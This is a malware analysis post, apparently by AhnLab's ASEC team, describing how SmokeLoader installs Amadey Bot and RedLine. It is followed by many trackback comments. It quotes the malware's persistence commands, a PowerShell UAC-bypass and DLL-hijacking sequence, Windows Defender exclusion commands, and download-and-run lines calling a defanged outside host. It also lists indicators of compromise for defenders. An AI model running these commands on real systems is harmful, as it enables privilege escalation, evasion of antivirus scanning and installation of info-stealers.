Amadey Bot Being Distributed Through SmokeLoader

Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it has been sold in illegal forums and used by various attackers.

The ASEC analysis team previously revealed cases where Amadey was used on attacks in the ASEC blog posted in 2019 (English version unavailable). Amadey was mainly used to install ransomware by attackers of GandCrab or to install FlawedAmmyy by the TA505 group that is infamous for Clop ransomware. The attackers of Fallout Exploit Kit and Rig Exploit Kit are also known for using Amadey.

The team has recently discovered that Amadey is being installed by SmokeLoader. SmokeLoader is a malware that has continuously been distributed during the last few years, taking up high proportion in the recent ASEC statistics. It is recently distributed by having users download the malware that is disguised as software cracks and serial generation programs from websites for distribution.

SmokeLoader provides various additional features related to info-stealing as plug-ins. It is normally used to install additional malware strains as a downloader. When SmokeLoader is run, it injects Main Bot into the currently running explorer process (explorer.exe). This means Bot that performs actual malicious behaviors operates inside the explorer process. The figure below shows AhnLab’s ASD log of SmokeLoader, which has been injected into explorer, downloading Amadey.

Figure 1. Amadey downloaded through SmokeLoader injected into the explorer process

When Amadey is run, it first copies itself to the Temp path below. Then, Amadey registers the folder where it exists as a startup folder to allow itself to be run after reboot. It also provides a feature to register itself to Task Scheduler to maintain persistence.

Amadey Installation Path
> %TEMP%\9487d68b99\bguuwe.exe

Command registered to Task Scheduler
> cmd.exe /C REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” /f /v Startup /t REG_SZ /d %TEMP%\9487d68b99\
> schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR “%TEMP%\9487d68b99\bguuwe.exe” /
F

Figure 2. Amadey shown on AhnLab’s ASD log

After going through the process mentioned above, the malware starts communicating with the C&C server. The following Fiddler log shows Amadey communicating with the C&C server, downloading the cred.dll plug-in to collect user environment information and send aos매to the C&C server, and installing RedLine info-stealer as an additional malware strain.

Figure 3. Amadey’s network traffic

The malware collects the information of the infected system before it connects to the C&C server. The information collected includes basic information such as computer name and user name, as well as a list of installed anti-malware products. Each part of the collected information is sent to the C&C server in an appropriate format. The server then can send the URL of additional malware strains that Amadey will download to make it operate as a downloader.

Figure 4. Data sent to the C&C server and data received from the C&C server
ItemData ExampleMeaning
id129858768759Infected system’s ID
vs3.21Amadey version
sd37bbd7Amadey ID
os9Windows version
ex) Windows 7 – 9
Windows 10 – 1
Windows Server 2012 – 4
Windows Server 2019 – 16
bi0Architecture (x86 – 0, x64 – 1)
ar0Admin privilege status (1 if admin privilege is available)
pcPCNAMEComputer name
unUSERNAMEUser name
dmDOMAINNAMEDomain name
av0List of installed anti-malware
lv0Set as 0
og1Set as 1
Table 1. Data sent to the C&C server

The table above indicates that the current version of Amadey discussed in this post is 3.21. Accessing the C&C panel of the current Amadey version under analysis shows how the current version is slightly different from the previous one.

Figure 5. Previous Amadey C&C panel login page
Figure 6. Latest Amadey C&C panel login page

Among items sent to the C&C server, “av” refers to the information of anti-malware installed on the infected environment. Each number is assigned to a particular anti-malware product. As ’13’ is chosen if the infected environment is Windows 10 or Windows Server 2019, it is likely the number is reserved for Windows Defender.

Anti-malware NameNumber
X0
Avast Software1
Avira2
Kaspersky Lab3
ESET4
Panda Security5
Dr. Web6
AVG7
360 Total Security8
Bitdefender9
Norton10
Sophos11
Comodo12
Windows Defender (assumed)13
Table 2. List of anti-malware for checking

Amadey also periodically takes screenshots and sends them to the C&C server. It captures the current screen in a JPG format and saves it with the name “129858768759” in the %TEMP% path. The screenshot is later sent to the C&C server with the POST method.

Figure 7. Sending screenshots to the C&C server

The network traffic figure shown above has “cred.dll”, meaning the malware downloaded a plug-in for stealing information. The plug-in developed with the Delphi programming language is downloaded to the %APPDATA% path. It is then run through rundll32.exe as having the Export function Main() as an argument as shown below.

> rundll32.exe %APPDATA%\406d6c22b040c6\cred.dll, Main

The list of information that is stolen includes emails, FTPs, VPN clients, etc. The information collected is sent to the same C&C server.

List of information targeted for info-stealing plug-in
– Mikrotik Router Management Program Winbox
– Outlook
– FileZilla
– Pidgin
– Total Commander FTP Client
– RealVNC, TightVNC, TigerVNC
– WinSCP

The Fiddler log mentioned above shows how Amadey installed additional malware from “hxxp://185.17.0[.]52/yuri.exe” besides the cred.dll plug-in. When Amadey periodically communicates with the C&C server to send the information of the infected system, the server usually sends the NULL data back. However, it can send a downloader command depending on the command. The downloader command is sent with encoded data, and decoding it will allow the malware to receive an URL for downloading additional malware. The malware downloaded from the URL is RedLine info-stealer.

Figure 8. RedLine info-stealer being installed by Amadey

Accessing “hxxp://185.17.0[.]52/” shows a list of files.

Figure 9. A webpage for Amadey to download

The table below explains each file. They include Amadey, RedLine, and downloader malware types used to install them.

NameType
Proxy.exeAutoit downloader malware
a.exeAmadey (unpacked original version)
ama.exeAmadey (NULL data added to a.exe)
au.exeAmadey (packed)
binAmadey downloader (x64 DLL)
xyz.exeDownloader (installs bin)
yuri.exRedLine info-stealer
Table 3. List of malware strains

xyz.exe and bin, which are downloader malware types, are developed with the Rust programming language. xyz.exe downloads bin and supports privilege escalation using the UAC bypass technique. The technique exploits AutoElevate and the mechanisms of AIS. AutoElevate is a program with the “” property as shown below. If certain conditions are met, it can be run as admin privilege without a UAC pop-up.

Figure 10. FXSUNATD.exe with the AutoElevate property

To do so, the program needs to be run in a trusted location such as System32 besides the property mentioned above. Hence the malware created the “C:\Windows \System32\” folder as shown below and copied “FXSUNATD.exe” (AutoElevate program) to satisfy the condition. AIS ignores spacings when internally checking paths. So if “FXSUNATD.exe” is run in the path mentioned earlier, it is recognized as being executed from a normal System32 path. The path check is successful and the program is run as AutoElevate (admin privilege).

> powershell.exe “New-Item -ItemType Directory ‘\?\C:\Windows \System32’; Copy-Item -Path ‘C:\Windows\System32\FXSUNATD.exe’ -Destination ‘C:\Windows \System32\’; powershell -windowstyle hidden $ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest hxxp://185.17.0[.]52/bin -Outfile ‘C:\Windows \System32\version.dll'”

> powershell.exe “Start-Process ‘C:\Windows \System32\FXSUNATD.exe'”

The malware then downloads a malicious DLL named version.dll in the same path. version.dll is a DLL used by “FXSUNATD.exe”. If the file is in the same path as “FXSUNATD.exe”, the DLL is executed first following the DLL load order when the exe program is run. The process is called DLL hijacking. By exploiting this mechanic, the malware loaded on a normal program is executed as “FXSUNATD.exe” is run after the malicious DLL (version.dll) is created in the same path.

Figure 11. Process tree of Amadey downloader

bin (version.dll) loaded and executed by “FXSUNATD.exe” is a downloader that installs Amadey and RedLine. When it is run, it uses the Windows Defender command to register the %ALLUSERSPROFILE% folder and %LOCALAPPDATA% directory that includes the Temp directory as exclusions. It then downloads and runs each malware type.

> powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\ProgramData\; Add-MpPreference -ExclusionPath $env:TEMP\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\msconfig.exe;

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile $env:TEMP\taskhost.exe

Initially distributed through exploit kits in the past, Amadey has been installed through SmokeLoader from malicious websites disguised as download pages for cracks and serials of commercial software until recently. Once the malware is installed, it can stay in the system to steal user information and download additional payloads. Users should apply the latest patch for OS and programs such as Internet browsers, and update V3 to the latest version to prevent malware infection in advance.

AhnLab’s anti-malware software, V3, detects and blocks the malware above using the aliases below.

[File Detection]
– Trojan/Win.MalPE.R503126 (2022.07.07.01)
– Trojan/Win.Amadey.C5196504 (2022.07.07.02)
– Trojan/Win.Delf.R462350 (2022.01.04.02)
– Trojan/Win.Generic.R503640 (2022.07.09.01)
– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)
– Malware/Win.Trojanspy.R438708 (2021.08.25.01)
– Trojan/Win.Amadey.C5200739 (2022.07.11.00)
– Downloader/Win.Agent.C5198969 (2022.07.10.00)
– Downloader/Win.Agent.C5198968 (2022.07.10.00)

[Behavior Detection]
– Malware/MDP.Download.M1197
– Execution/MDP.Powershell.M2514

[IOC]
MD5

– c3b7cf4c76cc20e56b180b001535696f (SmokeLoader)
– 6a87b10b372f64f7890def6fbaf08bfc (bguuwe.exe: Amadey)
– 77ce635ba7fb55f0c844077fee828ce7 (cred.dll: Stealer Plugin)
– 0f4351c43a09cb581dc01fe0ec08ff83 (yuri.exe: RedLine)
– 600bb5535d0bfc047f5c61f892477045 (Proxy.exe: Autoit downloader)
– 18bb226e2739a3ed48a96f9f92c91359 (a.exe: Amadey – unpacked original version)
– 27f626db46fd22214c1eb6c63193d2a0 (ama.exe: Amadey – NULL data added to a.exe)
– 977697e93a3b2635a5b8fb7dc3dfaf6b (au.exe: Amadey – packed)
– f0cdfc42f1c1c0c2d9b518e5cb31c788 (bin: Amadey downloader – x64 DLL)
– 0fd121b4a221c7767bd58f49c3d7cda5 (xyz.exe: Downloader – installs bin)

Download URL
– hxxp://185.17.0[.]52/yala.exe (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/Plugins/cred.dll (Stealer Plugin)
– hxxp://185.17.0[.]52/yuri.exe (RedLine)
– hxxp://185.17.0[.]52/Proxy.exe (Autoit downloader malware)
– hxxp://185.17.0[.]52/a.exe (Amadey – unpacked original version)
– hxxp://185.17.0[.]52/ama.exe (Amadey – NULL data added to a.exe)
– hxxp://185.17.0[.]52/au.exe (Amadey – packed)
– hxxp://185.17.0[.]52/bin (Amadey downloader – x64 DLL)
– hxxp://185.17.0[.]52/xyz.exe (Downloader – installs bin)

C2
– hxxp://host-file-host6[.]com (SmokeLoader)
– hxxp://host-host-file8[.]com (SmokeLoader)
– hxxp://teamfighttacticstools[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://nftmatrixed[.]info/5Lsq3FR/index.php (Amadey)
– 185.17.0[.]63:34397 (RedLine)

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 1 vote
Article Rating
guest
84 Comments
Inline Feedbacks
View all comments
trackback

[…] its distribution has faded after 2020, Korean researchers at AhnLab report that a new version has entered circulation and is supported by the equally old but still […]

trackback

[…] 参考記事(外部リンク):Amadey Bot Being Distributed Through SmokeLoaderasec.ahnlab.com/en/36634/ […]

trackback

[…] installed, it can stay in the system to steal user information and download additional payloads.” concludes the report. “Users should apply the latest patch for OS and programs such as Internet browsers, and update […]

trackback

[…] installed, it can stay in the system to steal user information and download additional payloads.” concludes the report. “Users should apply the latest patch for OS and programs such as Internet browsers, and update […]

trackback

[…] installed, it can stay in the system to steal user information and download additional payloads.” concludes the report. “Users should apply the latest patch for OS and programs such as Internet browsers, and update […]

trackback

[…] AhnLab’s cybersecurity researchers have known a brand new model of the Amadey Bot malware after a four-year hiatus. The most recent iteration of Amadey ditches Rig exploit kits and Fallout for extra environment friendly recon, penetration, and C2 options. In keeping with the analysis staff, SmokeLoader, the malware in control of deploying Amadey at the sufferer’s system, lands at the tool with the consumer’s permission. On this case, the malware’s creators will trap within the customers through disguising SmokeLoader right into a keygen or a device crack. […]

trackback

[…] AhnLab’s cybersecurity researchers have recognized a brand new model of the Amadey Bot malware after a four-year hiatus. The most recent iteration of Amadey ditches Rig exploit kits and Fallout for extra environment friendly recon, penetration, and C2 options. In accordance with the analysis workforce, SmokeLoader, the malware in command of deploying Amadey on the sufferer’s machine, lands on the system with the person’s permission. On this case, the malware’s creators will lure within the customers by disguising SmokeLoader right into a keygen or a software program crack. […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on programs by the use of SmokeLoader, a malware dropper that attackers were the use of since no less than […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on methods by way of SmokeLoader, a malware dropper that attackers have been utilizing since no less than […]

trackback

[…] Pero los investigadores de AhnLab de Corea del Sur detectaron recientemente la nueva variante. siendo instalado en sistemas a través de SmokeLoaderun cuentagotas de malware que los atacantes han estado usando desde al menos […]

trackback

[…] jalan bagi penyebaran Amadey, peneliti dari AhnLab Security Emergency Response Center (ASEC) dikatakan dalam laporan yang diterbitkan minggu […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] distribute Amadey. But researchers at South Korea’s AhnLab recently spotted the new variant being installed on systems via SmokeLoader, a malware dropper that attackers have been using since at least […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] de Amadey, investigadores del Centro de Respuesta a Emergencias de Seguridad AhnLab (ASEC) dijo en un informe publicado la semana […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] Kore’nin AhnLab’ındaki araştırmacılar son zamanlarda yeni varyantı tespit etti. SmokeLoader aracılığıyla sistemlere kurulmaksaldırganların en az 2011’den beri kullandığı bir kötü amaçlı yazılım […]

trackback

[…] la implementación de Amadey, investigadores del AhnLab Security Emergency Response Center (ASEC) dijo en un informe publicado la semana […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] au déploiement d’Amadey, des chercheurs du AhnLab Security Emergency Response Center (ASEC) a dit dans un rapport publié la semaine […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Safety Emergency Response Middle (ASEC) mentioned in a report printed final […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on techniques by way of SmokeLoader, a malware dropper that attackers have been utilizing since a minimum of […]

trackback

[…] However researchers at South Korea’s AhnLab not too long ago noticed the brand new variant being put in on programs by way of SmokeLoader, a malware dropper that attackers have been utilizing since no less than […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Safety Emergency Response Heart (ASEC) mentioned in a report revealed final […]

trackback

[…] gibi görünen SmokeLoader’ı indirmeleri için kullanıcıları kandırmaya dayanıyor. söz konusu Geçen hafta yayınlanan bir […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Safety Emergency Response Heart (ASEC) mentioned in a report revealed final […]

trackback

[…] its distribution has faded after 2020, Korean researchers at AhnLab report that a new version has entered circulation and is supported by the equally old but still […]

trackback

[…] for the deployment of Amadey, researchers from the AhnLab Security Emergency Response Center (ASEC) said in a report published last […]